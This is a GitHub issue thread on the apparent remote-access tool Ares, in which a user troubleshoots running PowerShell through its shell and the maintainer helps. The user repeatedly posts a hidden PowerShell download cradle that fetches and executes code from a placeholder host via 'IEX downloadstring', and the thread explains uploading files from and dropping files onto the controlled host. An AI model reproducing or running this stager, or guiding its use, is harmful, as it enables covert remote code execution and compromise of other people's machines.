### ISSUE TITLE
powershell command 

### ISSUE THREAD

**Issue by vasco2016** [sweetsoftware/Ares#4]
Is it possible to execute powershell command thru Ares cmd ?

**Comment by sweetsoftware** [comment]
Hi @vasco2016,
As of today the shell is a non-interactive cmd.exe shell.
It means you can run any powershell commands out of the box by prefixing your commands with __powershell /c__ *powershell command*
 For an interactive shell, some coding has to be done.

**Comment by vasco2016** [comment]
hmm ... its dont work when i trye this for exemple. Do you have any ide how to make it works ? 

powershell /c  -nop -w hidden -c $Q=new-object net.webclient;$Q.proxy=[Net.WebRequest]::GetSystemWebProxy();$Q.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $Q.downloadstring('http://x.x.x.x:8080/');

original string is like this 

powershell.exe -nop -w hidden -c $Q=new-object net.webclient;$Q.proxy=[Net.WebRequest]::GetSystemWebProxy();$Q.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $Q.downloadstring('http://x.x.x.x:8080/');

**Comment by sweetsoftware** [comment]
I tried on my machine, using powershell /c works as you can see
![capture](https://cloud.githubusercontent.com/assets/7887442/12594900/aad19a10-c478-11e5-842c-4eed73f5d0c3.PNG)

Can you run a command at all ? Maybe the shell hangs because you launched an interactive command (eg powershell.exe without /c) and now the process is waiting indefinitely.

**Comment by vasco2016** [comment]
sorry dont work for me i can run dir, cd, whoami all  standard commands but it dont  work for me with powershell :( 

When i execute powershell.exe -w hidden -nop -c echo hallo i dont get any respons when i try do this on my vm i get disconnected.

**Comment by vasco2016** [comment]
now i get 

Missing ')' in method call.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordEx 
   ception
    + FullyQualifiedErrorId : MissingEndParenthesisInMethodCall
 
'apos' is not recognized as an internal or external command,
operable program or batch file.
'apos' is not recognized as an internal or external command,
operable program or batch file.

**Comment by vasco2016** [comment]
This strin works if  i put it in cmd or powershell but when i execute it i get this error. 


powershell.exe  -w hidden -nop -c $I=new-object net.webclient;$I.proxy=[Net.WebRequest]::GetSystemWebProxy();$I.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $I.downloadstring('http://x.x.x.x:8080/');

get this error 

Missing ')' in method call.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordEx 
ception
+ FullyQualifiedErrorId : MissingEndParenthesisInMethodCall

'apos' is not recognized as an internal or external command,
operable program or batch file.
'apos' is not recognized as an internal or external command,
operable program or batch file.

Do you have any ide what wrong on the way ?

**Comment by vasco2016** [comment]
ok i can make workaround how do i upload ? 

When i type upload nothing happand . 

upload /home/my.exe

**Comment by sweetsoftware** [comment]
You have to be in the same folder, try cd and then upload my.exe.
The upload command uploads a file from host to the server, for dropping files on the host use download.
